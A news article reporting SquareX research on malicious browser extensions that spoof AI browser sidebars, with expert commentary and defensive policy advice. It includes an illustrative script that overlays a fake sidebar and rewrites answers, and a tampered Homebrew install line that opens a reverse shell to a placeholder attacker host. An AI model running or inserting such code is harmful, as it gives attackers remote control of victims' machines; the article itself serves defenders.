AI browsers may be smart, but they’re not smart enough to block a common threat: malicious extensions.

That’s the conclusion of researchers at SquareX, who on Thursday released a report showing how attackers can exploit AI sidebars through compromised browser extensions.

This attack vector isn’t new: for years, malicious extensions have been slipped into browser web stores to infect standard browsers such as Chrome, Edge, and Firefox.

What SquareX discovered is that malicious extensions can spoof the legitimate AI sidebars people use for queries. Their goal is to trick users into visiting malicious websites, running data-exfiltration commands, or installing backdoors. AI sidebar spoofing even works on the just-released OpenAI Atlas browser, SquareX says.

One solution for CISOs and CIOs, the report suggests, is to ban the use of AI browsers. That assumes the IT department can control which browsers staff are using, particularly if employees are allowed to use their own internet-connected devices. At the very least, IT must audit all extensions installed by employees, for AI and non-AI browsers alike, the report says.

Treat anything AI with zero-trust protocols

CISOs and CIOs need to treat anything AI with the strongest zero-trust protocols available, at least until better-functioning guardrails are established, commented Ed Dubrovsky, chief operating officer of incident response firm Cypfer.

“Establish a set of guardrails around AI use and functionality,” he said, “and if you are allowing AI vulnerable software into your corporate network, segment it into a place where it can’t get into the Digital Crown Jewels, or even have an awareness of them.” 

He pointed out that AI is a completely different playing field, one that CSOs are not yet prepared for. The challenge is that IT leaders are thinking of AI as a new tool or toolset and trying to apply software development and maintenance methodologies to its management.

But in his view, AI is closer to “I just hired 100 new employees with very little vetting or appropriate security controls, how do I secure my assets in case some of them are malicious?”

“AI is not only a language chatbot, but it also has agentic function where tasks are defined and deployed, and AI software can be written and deployed by AI,” he said. “This pushes the human away from the keyboard, in a way, and replaces it with a new software capability.” 

The risk is that AI is not, and likely never will be, completely foolproof, he added. There may come a day when AI is powerful enough to resist most human attempts to fool it, but, he asked, can it avoid being manipulated by other AIs?

‘Dumpster fires’

David Shipley, head of Canadian employee security awareness training firm Beauceron Security, agrees.

“I think if CISOs are bored and want to spice up their lives with an incident, they should roll out these AI-powered hot messes to their users,” he said.

“But, if they’re like most CISOs and they have lots of problems, but free time and boredom aren’t on that list, they should avoid these dumpster fires [AI browsers] at all costs.”

Building and supporting a legitimate browser and extension ecosystem is difficult work, he argued, pointing out that even Apple, Google, and Microsoft still have issues.

“I think it’s a mistake to think of the risk as just being about extensions,” he added. “It’s the fundamental DNA of these browsers that is bad; the companies aren’t incented to pay enough attention to the problems, and bad extensions are just the straw that breaks cybersecurity’s back.”

How it works

CISOs have a tough challenge: it’s not hard to fool an employee into downloading and installing a malicious extension for any browser. Browser extensions are, by design, attractive add-on utilities such as password managers or AI productivity assistants. They are promoted in phishing and smishing messages and social media posts, and, when threat actors can manage it, uploaded to marketplaces such as the Google Chrome Web Store. A malicious extension may be malware disguised as a legitimate tool, or a compromised version of a real one.

In AI Sidebar Spoofing, the SquareX report says, once a victim opens a new AI browser tab, the malicious extension injects JavaScript into the web page to create a fake sidebar that looks exactly like the legitimate one. When the user enters a prompt into the spoofed sidebar, the extension intercepts it and hooks into an AI engine to generate plausible answers. If the prompt asks for certain kinds of instructions or guidance, the extension can manipulate the response to include additional, attacker-chosen instructions. For example, if the user asks for good file-sharing sites, the malicious extension might return a link to the attacker’s file-sharing site, which requests high-risk OAuth permissions the attacker can harvest; in the hands of a hacker, those permissions could allow access to the victim’s email.
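SquareX has not published its proof-of-concept code, but the overlay-and-tamper pattern it describes can be sketched in a few lines. The following is a hypothetical illustration only: the selectors, function names, and domains are invented, and fetchAnswerFromRealAssistant() is a stub standing in for however a real attack would relay prompts to a genuine AI backend to keep answers convincing.

```javascript
// Hypothetical sketch of the spoofing pattern described above -- NOT SquareX's
// actual proof of concept. All selectors, names, and domains are placeholders.
// content-script.js: injected into every page via the extension's manifest.

// Stub standing in for relaying the prompt to a real AI backend so the
// spoofed sidebar's answers remain convincing.
async function fetchAnswerFromRealAssistant(prompt) {
  return `Here are some options for "${prompt}": https://legit-service.example`;
}

// Swap trusted links (or commands) in an otherwise plausible answer for
// attacker-controlled ones, keyed on the topic of the prompt.
function tamperWithAnswer(prompt, answer) {
  if (/file.?sharing/i.test(prompt)) {
    return answer.replace(/https:\/\/\S+/g, "https://files.attacker.example");
  }
  return answer;
}

// Draw a fake sidebar styled to match the browser's real one, then intercept
// every prompt the user types into it.
function injectFakeSidebar() {
  const sidebar = document.createElement("div");
  sidebar.style.cssText =
    "position:fixed;top:0;right:0;width:360px;height:100vh;" +
    "background:#fff;border-left:1px solid #ddd;z-index:2147483647;";
  sidebar.innerHTML = `
    <div class="chat-log"></div>
    <input class="prompt-box" placeholder="Ask anything...">`;
  document.body.appendChild(sidebar);

  sidebar.querySelector(".prompt-box").addEventListener("keydown", async (e) => {
    if (e.key !== "Enter") return;
    const prompt = e.target.value;
    const answer = await fetchAnswerFromRealAssistant(prompt);
    sidebar.querySelector(".chat-log").textContent = tamperWithAnswer(prompt, answer);
  });
}

injectFakeSidebar();
```

The key point of the sketch is that nothing in it requires breaking the browser: a content script with ordinary DOM access can draw a pixel-perfect sidebar overlay and silently rewrite whatever “the assistant” appears to say.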

In one test, when a SquareX researcher asked a malicious sidebar extension how to install the Homebrew package manager for macOS or Linux, the instructions included an installation command line that also executed a reverse shell, which would have connected the victim’s device to the attacker’s server and given the attacker a system shell in which to execute commands on the victim’s machine.
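For scale, consider what that tampering amounts to. The genuine Homebrew installer is a single, widely pasted one-liner, so a spoofed sidebar only has to append one extra statement to an otherwise correct answer. A hypothetical illustration follows; the official URL is real, but the appended payload, host, and port are placeholders, not the command SquareX observed.

```javascript
// The genuine Homebrew install command, as published at brew.sh.
const OFFICIAL_INSTALL =
  '/bin/bash -c "$(curl -fsSL https://raw.githubusercontent.com/Homebrew/install/HEAD/install.sh)"';

// Hypothetical tampering: appending a classic reverse-shell one-liner means the
// pasted command still installs Homebrew -- and also hands the attacker a shell.
// The host and port are placeholders.
const TAMPERED_INSTALL =
  OFFICIAL_INSTALL + " && bash -i >& /dev/tcp/attacker.example/4444 0>&1";
```

Because the visible output is nearly identical to the real instructions, even a careful user comparing against memory is unlikely to notice the extra clause.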

It’s critical that infosec leaders set granular, browser-native policies that prevent users from carrying out malicious tasks as instructed by a fake AI sidebar, says the report. These would include a policy that blocks advanced phishing sites using machine learning and page-heuristic analysis, a policy that blocks high-risk permissions from being granted to non-allowlisted apps, and a policy that warns users about, and blocks the copying of, malicious or risky Linux commands.
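The report doesn’t name specific products or settings, but Chrome’s enterprise ExtensionSettings policy is one existing, widely deployed control in this class. A minimal sketch of the default-deny pattern follows; the 32-character extension ID is a placeholder. It blocks all extensions except an explicitly approved one and refuses high-risk permissions across the board:

```json
{
  "*": {
    "installation_mode": "blocked",
    "blocked_permissions": ["scripting", "history", "webRequest"]
  },
  "aaaabbbbccccddddeeeeffffgggghhhh": {
    "installation_mode": "allowed"
  }
}
```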

The research “is a warning shot for the early days of agentic browsing and [reminds users] that the implicit trust model of the UI needs rethinking,” said Gabrielle Hempel, security operations strategist at Exabeam.

“The main issue here is that agentic-AI browsers introduce an entirely new attack surface. This attack, a malicious extension injecting a fake AI sidebar overlay that looks like the real one, allows threat actors to hijack the ‘trusted’ AI assistant UI and trick users into executing dangerous operations,” she pointed out. “Organizations need to be taking this seriously, because when you delegate browsing and actions to an AI sidebar, you are elevating what previously might have been a minor risk into a material risk to cloud assets, credentials, and devices.”

IT leaders should restrict AI browser use for high-risk functions until the browsers are proven secure, she advised. And because the attack relies on an extension with host and storage permissions, organizations should revisit their extension approval workflows for those permissions as well. In fact, any productivity tool that requests broad access warrants scrutiny.
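The permission combination she describes is easy to spot in review. Below is a hypothetical manifest for such an extension (the name and file names are invented): the host_permissions and content_scripts entries give it the ability to read and rewrite every page the user visits, which is exactly the capability sidebar spoofing needs.

```json
{
  "manifest_version": 3,
  "name": "AI Productivity Helper",
  "version": "1.0",
  "permissions": ["storage", "scripting"],
  "host_permissions": ["<all_urls>"],
  "content_scripts": [{
    "matches": ["<all_urls>"],
    "js": ["content-script.js"]
  }]
}
```

Any extension requesting <all_urls> access should clear a higher approval bar than one scoped to a handful of sites.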

“Segmentation is also important once these tools are implemented: least privilege applies here and AI interaction with certain tabs/services should be limited,” she said. 

This article originally appeared on Computerworld.
